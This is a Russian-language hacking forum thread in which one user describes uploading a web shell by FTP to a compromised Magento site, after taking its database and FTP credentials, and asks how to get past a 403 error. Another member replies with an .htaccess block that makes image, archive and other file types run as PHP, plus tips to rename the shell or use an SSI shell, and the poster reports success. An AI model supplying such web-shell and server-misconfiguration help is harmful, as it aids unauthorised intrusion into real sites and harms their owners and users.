Вопрос. Залил шелл - 403 Forbidden

Discussion in 'Веб-уязвимости' started by firstnamel4stname, 7 Dec 2019.

  1. firstnamel4stname

    firstnamel4stname New Member

    Joined:
    29 Sep 2019
    Messages:
    51
    Likes Received:
    2
    Reputations:
    0
    Подскажите, пожалуйста, как получить доступ к шеллу, если 403 выскакивает?
    [​IMG]
    1. Залил шелл через ФТП. доступ только к этой директории был, там везде 403.
    2. через IDE в админке магенты проверил, что файл реально залился и присутствует там. (через IDE можно все файлы смотреть, но при редактировании и сохранении почему-то не сохраняются, поэтому стащил данные от БД и ФТП только. downloader'а нет.
    3. ну и при открытии соответственно показывает 403 ошибку. мб в папку с шеллом htaccess можно подгрузить, чтобы этот файл можно было просматривать (не знаю какое содержимое должнo быть у htaccess)? какие варианты есть?
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    попробуй файл переименовать в index.php и обратиться к нему как site.com/export/det/

    P.S: на счет htaccess попробуй

    Code:
    Options All -Indexes
    <IfModule mod_php4.c>
    php_flag engine 1
    </IfModule>
    <IfModule mod_php5.c>
    php_flag engine 1
    </IfModule>
    AddHandler php5-script .php
    AddHandler php5-script .gif
    Options +ExecCGI
    AddType text/html .shtml
    AddHandler server-parsed .shtml
    <IfModule mod_mime.c>
    AddType application/x-httpd-php .fla
    AddType application/x-httpd-php .phtml
    AddType application/x-httpd-php .gif
    AddType application/x-httpd-php .php4
    AddType application/x-httpd-php .zip
    AddType application/x-httpd-php .php
    </IfModule>
     
    _________________________
  3. firstnamel4stname

    firstnamel4stname New Member

    Joined:
    29 Sep 2019
    Messages:
    51
    Likes Received:
    2
    Reputations:
    0
    [​IMG]
    вроде все так сделал, не получилось... там в корневой папке .htaccess висит с deny from all. мб htaccess с другим содержимым нужен? чтобы разрешен был просмотр этого файла в этой папке?

    все получилось, удалось отредактировать корневой htaccess :D
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    в начало htaccess еще попробуйте добавить:
    Allow from all

    Это конечно может помочь если сервак на apache, ну еще попробуйте ssi шел
     
    _________________________
Loading...